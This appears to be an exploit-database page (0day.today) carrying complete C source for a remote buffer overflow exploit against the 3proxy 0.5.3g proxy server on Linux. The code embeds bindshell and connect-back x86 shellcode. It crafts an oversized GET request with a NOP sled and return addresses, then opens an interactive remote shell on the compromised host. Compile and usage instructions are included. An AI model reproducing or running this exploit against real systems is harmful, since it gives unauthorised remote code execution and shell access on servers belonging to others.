0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
3proxy 0.5.3g proxy.c logurl() Remote Buffer Overflow Exploit (linux)
===================================================================== 3proxy 0.5.3g proxy.c logurl() Remote Buffer Overflow Exploit (linux) ===================================================================== /*[ 3proxy[v0.5.3g]: (linux) remote buffer overflow exploit. ]*** * * * by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) * * * * compile: * * gcc x3proxy.c -o x3proxy * * * * syntax: * * ./x3proxy [-pscr+] -h host * * * * sumus homepage/url: * * http://3proxy.ru/ * * * * 3Proxy tiny free proxy server previously known as 3[APA3A] * * tiny freeware proxy. * * * * I just saw a (gentoo) advisory, and got curious how easy * * it would be to exploit this. The vulnerability is fairly * * trival: * * * * ----------------------------------------------------------- * * GET /[NOPS][SHELLCODE][RETADDR]\n * * Host: [FILLER]\n\n * * ----------------------------------------------------------- * * * * The length of "Host: [FILLER]" is exactly how many bytes * * past the buffer boundary it will go, if it's not there it * * won't overflow. The vulnerability can be found in proxy.c * * in the logurl() function. (buf[LINESIZE]) * * * * I didn't work out a common place to find the shellcode in * * memory. but, the following values(-r option) worked for * * me: * * 0x0805333c (gentoo/r2 0.5.3g src compile) * * 0x08054da8 (mandrake 0.5.3g src compile) * * * * It will probably be easiest to run through a debugger and * * find where the address of the shellcode is. (offsets of * * around 1500 when brute guessing) * ***************************************************************/ #include <stdio.h> #include <stdlib.h> #ifndef __USE_BSD #define __USE_BSD #endif #include <string.h> #include <strings.h> #include <signal.h> #include <unistd.h> #include <netdb.h> #include <getopt.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/time.h> #include <netinet/in.h> #include <arpa/inet.h> #define BUFSIZE 2200 #define TIMEOUT 10 #define DFL_PORT 3128 #define DFL_SPORT 7979 #define DFL_RETADDR 0x08048004 /* globals. */ static char x86_bind[]= /* bindshell, from netric. */ "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66" "\xcd\x80\x31\xd2\x52\x66\x68\xff\xff\x43\x66\x53\x89" "\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89" "\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52" "\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80" "\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68" "\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd" "\x80"; static char x86_conn[]= /* connect-back, eSDee/netric. */ "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51" "\xb1\x02\x51\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2" "\x31\xc0\x31\xc9\x51\x51\x68\xff\xff\xff\xff\x66\x68" "\xff\xff\xb1\x02\x66\x51\x89\xe7\xb3\x10\x53\x57\x52" "\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1\x74" "\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31" "\xc0\xb0\x3f\x89\xd3\xb1\x02\xcd\x80\x31\xc0\x31\xd2" "\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3" "\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd" "\x80"; char *x86_ptr; struct{ unsigned int addr; signed int off; char *host; unsigned short port; unsigned short sport; }tbl; /* lonely extern. */ extern char *optarg; /* functions. */ char *getbuf(unsigned int); unsigned short proxy_connect(char *,unsigned short); signed int getshell_bind_init(unsigned short); signed int getshell_bind_accept(signed int); signed int getshell_conn(char *,unsigned short); void proc_shell(signed int); void printe(char *,short); void usage(char *); void sig_alarm(){printe("alarm/timeout hit.",1);} /* start. */ int main(int argc,char **argv){ signed int chr=0,rsock=0; unsigned int bs=0; struct hostent *t; in_addr_t s=0; printf("[*] 3proxy[v0.5.3g]: (linux) remote buffer overflow explo" "it.\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)\n\n"); tbl.port=DFL_PORT; tbl.sport=DFL_SPORT; tbl.addr=DFL_RETADDR; while((chr=getopt(argc,argv,"h:p:s:c:r:+:"))!=EOF){ switch(chr){ case 'h': if(!tbl.host&&!(tbl.host=(char *)strdup(optarg))) printe("main(): allocating memory failed",1); break; case 'p': tbl.port=atoi(optarg); break; case 's': tbl.sport=atoi(optarg); break; case 'c': if((s=inet_addr(optarg))){ if((t=gethostbyname(optarg))) memcpy((char *)&s,(char *)t->h_addr,sizeof(s)); if(s==-1)s=0; if(!s)printe("invalid host/ip. (-c option)",0); } break; case 'r': sscanf(optarg,"%x",&tbl.addr); break; case '+': tbl.off=atoi(optarg); break; default: usage(argv[0]); break; } } if(!tbl.host)usage(argv[0]); /* set bind port for shellcode. */ if(!s){ bs=strlen(x86_bind); x86_bind[20]=(tbl.sport&0xff00)>>8; x86_bind[21]=(tbl.sport&0x00ff); x86_ptr=x86_bind; } /* set connect-back ip/port for shellcode. */ else{ bs=strlen(x86_conn); x86_conn[33]=(s&0x000000ff); x86_conn[34]=(s&0x0000ff00)>>8; x86_conn[35]=(s&0x00ff0000)>>16; x86_conn[36]=(s&0xff000000)>>24; x86_conn[39]=(tbl.sport&0xff00)>>8; x86_conn[40]=(tbl.sport&0x00ff); x86_ptr=x86_conn; } if(bs!=strlen(x86_ptr)) printe("ip(-c option) and/or port(-s option) appear to contain a " "null-byte, try again.",1); printf("[*] target\t\t\t: %s:%d\n",tbl.host,tbl.port); printf("[*] shellcode type\t\t: %s(port=%d)\n", (s?"connect-back":"bindshell"),tbl.sport); printf("[*] return address($eip)\t: 0x%.8x(+%d=0x%.8x)\n",tbl.addr, tbl.off,tbl.addr+tbl.off); if(s){ rsock=getshell_bind_init(tbl.sport); proxy_connect(tbl.host,tbl.port); rsock=getshell_bind_accept(rsock); } else{ proxy_connect(tbl.host,tbl.port); rsock=getshell_conn(tbl.host,tbl.sport); } if(rsock>0)proc_shell(rsock); exit(0); } /* make buf: "GET /[NOPS][SHELLCODE][RETADDR]\nHost: [FILLER]\n\n" */ char *getbuf(unsigned int addr){ unsigned int i=0; char *buf; if(!(buf=(char *)malloc(BUFSIZE+1))) printe("getbuf(): allocating memory failed.",1); strcpy(buf,"GET /"); memset(buf+5,'\x90',1800); strcat(buf,x86_ptr); for(i=strlen(buf);i<2100;i+=4){ *(long *)&buf[i]=addr; } strcat(buf,"\nHost: "); memset(buf+strlen(buf),'x',(BUFSIZE-strlen(buf)-3-2)); strcat(buf,"\n\n"); return(buf); } /* connects to the vulnerable 3proxy server. */ unsigned short proxy_connect(char *hostname,unsigned short port){ signed int sock; struct hostent *t; struct sockaddr_in s; sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); s.sin_family=AF_INET; s.sin_port=htons(port); printf("[*] attempting to connect: %s:%d.\n",hostname,port); if((s.sin_addr.s_addr=inet_addr(hostname))){ if(!(t=gethostbyname(hostname))) printe("couldn't resolve hostname.",1); memcpy((char *)&s.sin_addr,(char *)t->h_addr,sizeof(s.sin_addr)); } signal(SIGALRM,sig_alarm); alarm(TIMEOUT); if(connect(sock,(struct sockaddr *)&s,sizeof(s))) printe("3proxy connection failed.",1); alarm(0); printf("[*] successfully connected: %s:%d.\n",hostname,port); sleep(1); printf("[*] sending string: \"GET /[NOPS][SHELLCODE][RETADDR]" "\\nHost: [FILLER]\\n\\n\"\n"); write(sock,getbuf(tbl.addr+tbl.off),BUFSIZE); sleep(1); printf("[*] closing connection.\n\n"); close(sock); return(0); } /* binds locally for connect-back. */ signed int getshell_bind_init(unsigned short port){ signed int ssock=0,so=1; struct sockaddr_in ssa; ssock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(void *)&so,sizeof(so)); #ifdef SO_REUSEPORT setsockopt(ssock,SOL_SOCKET,SO_REUSEPORT,(void *)&so,sizeof(so)); #endif ssa.sin_family=AF_INET; ssa.sin_port=htons(port); ssa.sin_addr.s_addr=INADDR_ANY; if(bind(ssock,(struct sockaddr *)&ssa,sizeof(ssa))==-1) printe("could not bind socket.",1); listen(ssock,1); return(ssock); } /* accepts locally for connect-back. */ signed int getshell_bind_accept(signed int ssock){ signed int sock=0; unsigned int salen=0; struct sockaddr_in sa; memset((char*)&sa,0,sizeof(struct sockaddr_in)); salen=sizeof(sa); printf("[*] awaiting connection from: *:%d.\n",tbl.sport); alarm(TIMEOUT); sock=accept(ssock,(struct sockaddr *)&sa,&salen); alarm(0); close(ssock); printf("[*] connection established. (connect-back)\n"); return(sock); } /* connects to bindshell. */ signed int getshell_conn(char *hostname,unsigned short port){ signed int sock=0; struct hostent *he; struct sockaddr_in sa; if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) printe("getshell_conn(): socket() failed.",1); sa.sin_family=AF_INET; if((sa.sin_addr.s_addr=inet_addr(hostname))){ if(!(he=gethostbyname(hostname))) printe("getshell_conn(): couldn't resolve.",1); memcpy((char *)&sa.sin_addr,(char *)he->h_addr, sizeof(sa.sin_addr)); } sa.sin_port=htons(port); signal(SIGALRM,sig_alarm); printf("[*] attempting to connect: %s:%d.\n",hostname,port); alarm(TIMEOUT); if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){ printf("[!] connection failed: %s:%d.\n",hostname,port); exit(1); } alarm(0); printf("[*] successfully connected: %s:%d.\n\n",hostname,port); return(sock); } /* process the bind/connect-back shell. */ void proc_shell(signed int sock){ signed int r=0; char buf[4096+1]; fd_set fds; signal(SIGINT,SIG_IGN); write(sock,"uname -a;id\n",13); while(1){ FD_ZERO(&fds); FD_SET(0,&fds); FD_SET(sock,&fds); if(select(sock+1,&fds,0,0,0)<1) printe("getshell(): select() failed.",1); if(FD_ISSET(0,&fds)){ if((r=read(0,buf,4096))<1) printe("getshell(): read() failed.",1); if(write(sock,buf,r)!=r) printe("getshell(): write() failed.",1); } if(FD_ISSET(sock,&fds)){ if((r=read(sock,buf,4096))<1)exit(0); write(1,buf,r); } } close(sock); return; } /* error! */ void printe(char *err,short e){ printf("[!] %s\n",err); if(e)exit(1); return; } /* usage. */ void usage(char *progname){ printf("syntax: %s [-pscr+] -h host\n\n",progname); printf(" -h <host/ip>\ttarget hostname/ip.\n"); printf(" -p <port>\ttarget port.\n"); printf(" -s <port>\tconnect-back/bind port. (shellcode)\n"); printf(" -c <host/ip>\tconnect-back host/ip. (enables " "connect-back)\n"); printf(" -r <addr>\tdefine return address. (0x%.8x)\n",tbl.addr); printf(" -+ <offset>\tadds to the -r option address.\n\n"); exit(0); } # 0day.today [2024-10-06] #